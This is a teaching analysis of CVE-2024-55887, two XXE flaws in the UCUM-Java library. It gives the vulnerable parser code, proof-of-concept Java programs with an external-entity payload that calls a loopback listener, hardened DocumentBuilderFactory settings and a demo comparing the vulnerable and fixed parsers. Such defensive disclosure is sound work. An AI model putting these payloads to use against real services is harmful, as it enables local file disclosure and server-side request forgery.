UCUM-Java XXE Vulnerability Analysis (CVE-2024-55887)
Word count 1205 | 2025-08-22 12:22:42
UCUM-Java XXE Vulnerability Analysis (CVE-2024-55887): Teaching Document
Vulnerability Overview
This document analyses two XXE (XML External Entity) vulnerabilities in the UCUM-Java library, one in the UcumEssenceService class and one in the XmlUtils class. Both exist because the XML parser is never configured to restrict DOCTYPE declarations or external entities, so a crafted XML document can make the parser read local files or fetch remote resources while it is being parsed.
Vulnerability Details
1. UcumEssenceService XXE vulnerability
Location: the constructor of the UcumEssenceService class
Vulnerable code:
public UcumEssenceService(InputStream stream) throws UcumException {
    super();
    assert stream != null : paramError("factory", "stream", "must not be null");
    try {
        // The stream is handed to the provider's XML parser as-is; nothing on this
        // path restricts DOCTYPE declarations or external entity resolution.
        model = DefinitionsProviderFactory.getProvider().parse(stream);
    } catch (Exception e) {
        throw new UcumException(e);
    }
}
Analysis:
- The constructor accepts an InputStream and passes it straight to DefinitionsProviderFactory.getProvider().parse().
- Nothing along that path applies any security configuration to the XML parser, so DOCTYPE declarations and external entity resolution remain enabled.
- An attacker who controls the stream (for example when the definition file is loaded from an untrusted location) can declare an external entity to read sensitive local files or to make the server issue requests to arbitrary URLs (SSRF).
Proof of concept:
import java.io.ByteArrayInputStream;
import java.io.InputStream;

// Package names follow the FHIR ucum-java project layout (org.fhir.ucum).
import org.fhir.ucum.UcumEssenceService;
import org.fhir.ucum.UcumException;

public class Main {
    public static void main(String[] args) throws UcumException {
        // External entity pointing at an attacker-controlled listener. The parser
        // fetches it while resolving &file;, before any UCUM-specific processing.
        String maliciousXml = "<?xml version = \"1.0\" encoding = \"utf-8\"?>\n" +
                "<!DOCTYPE test [\n" +
                "  <!ENTITY file SYSTEM \"http://127.0.0.1:8000/xxe\">\n" +
                "]>\n" +
                "<author>&file;</author>";
        InputStream inputStream = new ByteArrayInputStream(maliciousXml.getBytes());
        // Start a listener on 127.0.0.1:8000 first. The request arrives even though the
        // document is not a valid UCUM definition and the constructor may throw afterwards.
        UcumEssenceService ucumEssenceService = new UcumEssenceService(inputStream);
        System.out.println("Hello, World!");
    }
}
2. XmlUtils XXE vulnerability
Location: the static parseDOM method of the XmlUtils class
Vulnerable code:
public static Document parseDOM(InputStream stream) throws ParserConfigurationException, SAXException, IOException {
    // Default factory: DOCTYPE allowed, external general and parameter entities
    // resolved, external DTDs loaded. Only namespace handling is configured.
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setNamespaceAware(false);
    DocumentBuilder builder = factory.newDocumentBuilder();
    Document doc = builder.parse(stream);
    return doc;
}
Analysis:
- The parser is created from a DocumentBuilderFactory left in its default configuration.
- External entity resolution is never disabled (neither DTD processing nor external general or parameter entities), so the parser will happily dereference SYSTEM identifiers.
- Any caller that feeds untrusted XML to this method exposes the host to file disclosure or server-side request forgery (SSRF).
Proof of concept:
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;

import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Package name assumed to match the ucum-java utilities package (org.fhir.ucum.utils).
import org.fhir.ucum.utils.XmlUtils;

public class Main {
    public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
        // Same payload as above; parseDOM resolves &file; by fetching the URL.
        String maliciousXml = "<?xml version = \"1.0\" encoding = \"utf-8\"?>\n" +
                "<!DOCTYPE test [\n" +
                "  <!ENTITY file SYSTEM \"http://127.0.0.1:8000/xxe\">\n" +
                "]>\n" +
                "<author>&file;</author>";
        InputStream inputStream = new ByteArrayInputStream(maliciousXml.getBytes());
        // With a listener on 127.0.0.1:8000 the request shows up as soon as this runs.
        Document doc = XmlUtils.parseDOM(inputStream);
    }
}
Remediation
1. UcumEssenceService
The constructor itself does not parse XML, so the fix belongs in the parser that DefinitionsProviderFactory.getProvider().parse() ultimately uses: that parser must be built with DOCTYPE declarations and external entities disabled, exactly as in the XmlUtils fix below. If the provider builds its DOM through XmlUtils.parseDOM, hardening that one method closes both paths. A caller that cannot change the library can instead buffer the stream and reject any document containing a DOCTYPE before handing it to the constructor.
2. XmlUtils
Modify parseDOM to configure the parser securely:
public static Document parseDOM(InputStream stream) throws ParserConfigurationException, SAXException, IOException {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    // Forbid DOCTYPE entirely: without a DTD there are no entity declarations, internal or
    // external, so this single feature blocks every entity-based XXE variant. Documents that
    // legitimately carry a DOCTYPE will be rejected with a SAXParseException.
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // Defence in depth for parser implementations that do not honour the feature above.
    // setFeature throws ParserConfigurationException if the implementation does not know a feature.
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    factory.setXIncludeAware(false);
    // Only changes how entity references are represented in the DOM; it does not stop the
    // parser from resolving them, so it is not an XXE control on its own.
    factory.setExpandEntityReferences(false);
    factory.setNamespaceAware(false);
    DocumentBuilder builder = factory.newDocumentBuilder();
    Document doc = builder.parse(stream);
    return doc;
}
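The following self-contained program is added here as an example; it is not part of the UCUM-Java project or of the original post. It ties the two proofs of concept above to the fix: it starts a loopback HTTP listener on 127.0.0.1:8000 (the address the PoCs use), feeds the PoC payload to a parser configured like the vulnerable XmlUtils.parseDOM and counts the out-of-band request, then feeds the same payload to the hardened configuration and shows that it is rejected before any request is made. It also contains a rejectDoctype guard that implements the "pre-validate the stream" option mentioned for the UcumEssenceService constructor, so that a caller can wrap an untrusted stream before passing it on. The class and method names (XxeDemo, parseUnsafe, parseSafe, rejectDoctype) and both XML documents are constructed for this example; it needs only the JDK (com.sun.net.httpserver lives in the jdk.httpserver module).

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.concurrent.atomic.AtomicInteger;

import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

import com.sun.net.httpserver.HttpServer;

public class XxeDemo {

    // Constructed payload, same shape as the page's PoC; the entity points at the
    // listener started in main(), so the whole run stays on the loopback interface.
    private static final String XXE_PAYLOAD =
            "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
          + "<!DOCTYPE test [\n"
          + "  <!ENTITY file SYSTEM \"http://127.0.0.1:8000/xxe\">\n"
          + "]>\n"
          + "<author>&file;</author>";

    // Constructed benign document without a DOCTYPE; the hardened parser must accept it.
    private static final String BENIGN = "<?xml version=\"1.0\"?><author>ucum</author>";

    // Mirrors the vulnerable XmlUtils.parseDOM: default factory, nothing disabled.
    static Document parseUnsafe(InputStream in) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(false);
        return f.newDocumentBuilder().parse(in);
    }

    // Hardened factory: the DOCTYPE ban alone stops entity-based XXE; the remaining
    // settings are defence in depth for parsers that lack disallow-doctype-decl.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setNamespaceAware(false);
        return f;
    }

    static Document parseSafe(InputStream in) throws Exception {
        return hardenedFactory().newDocumentBuilder().parse(in);
    }

    // Guard for callers that cannot change the parser they hand the stream to (the
    // UcumEssenceService constructor case): buffer the bytes, let the hardened parser
    // reject anything with a DOCTYPE, and return a fresh stream for the real consumer.
    static InputStream rejectDoctype(InputStream in) throws Exception {
        byte[] bytes = in.readAllBytes();
        parseSafe(new ByteArrayInputStream(bytes)); // throws SAXParseException on DOCTYPE
        return new ByteArrayInputStream(bytes);
    }

    private static InputStream stream(String xml) {
        return new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) throws Exception {
        AtomicInteger hits = new AtomicInteger();
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 8000), 0);
        server.createContext("/xxe", ex -> {
            hits.incrementAndGet();                      // one hit per entity resolution
            byte[] body = "<x/>".getBytes(StandardCharsets.UTF_8); // well-formed entity text
            ex.sendResponseHeaders(200, body.length);
            ex.getResponseBody().write(body);
            ex.close();
        });
        server.start();
        try {
            parseUnsafe(stream(XXE_PAYLOAD));
            System.out.println("unsafe parser: listener hit " + hits.get() + " time(s)");

            hits.set(0);
            try {
                parseSafe(stream(XXE_PAYLOAD));
            } catch (SAXParseException e) {
                System.out.println("hardened parser rejected payload: " + e.getMessage());
            }
            System.out.println("hardened parser: listener hit " + hits.get() + " time(s)");

            // A guarded stream is what a caller would pass to new UcumEssenceService(...).
            InputStream ok = rejectDoctype(stream(BENIGN));
            System.out.println("benign document root: " + parseSafe(ok).getDocumentElement().getTagName());
        } finally {
            server.stop(0);
        }
    }
}
```

Run it with `java XxeDemo.java` on JDK 11 or later. The unsafe parse should register one hit on the listener, the hardened parse none, and the benign document should come back with root element author. If port 8000 is already bound, change it in both the payload and the listener; the entity resolution is what triggers the callback, so the page's PoCs behave the same way against a listener of your own.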
Secure Coding Recommendations
- Disable DOCTYPE declarations: set http://apache.org/xml/features/disallow-doctype-decl to true. This is the single most effective control; the settings below are defence in depth.
- Disable external entities:
  - set http://xml.org/sax/features/external-general-entities to false
  - set http://xml.org/sax/features/external-parameter-entities to false
- Disable external DTD loading: set http://apache.org/xml/features/nonvalidating/load-external-dtd to false
- Disable XInclude: setXIncludeAware(false)
- Disable entity reference expansion: setExpandEntityReferences(false) (this only affects how references appear in the DOM and must not be relied on by itself)
- Apply the same settings to every XML parser the application creates (SAXParserFactory, XMLInputFactory, TransformerFactory and so on), not only to DocumentBuilderFactory.
Summary
Both XXE vulnerabilities stem from an XML parser left in its default configuration. When processing XML in Java, external entity resolution must be disabled explicitly, because the JDK's default DocumentBuilderFactory resolves external entities unless told otherwise. Developers should follow the principle of least privilege and enable only the XML features the application actually needs.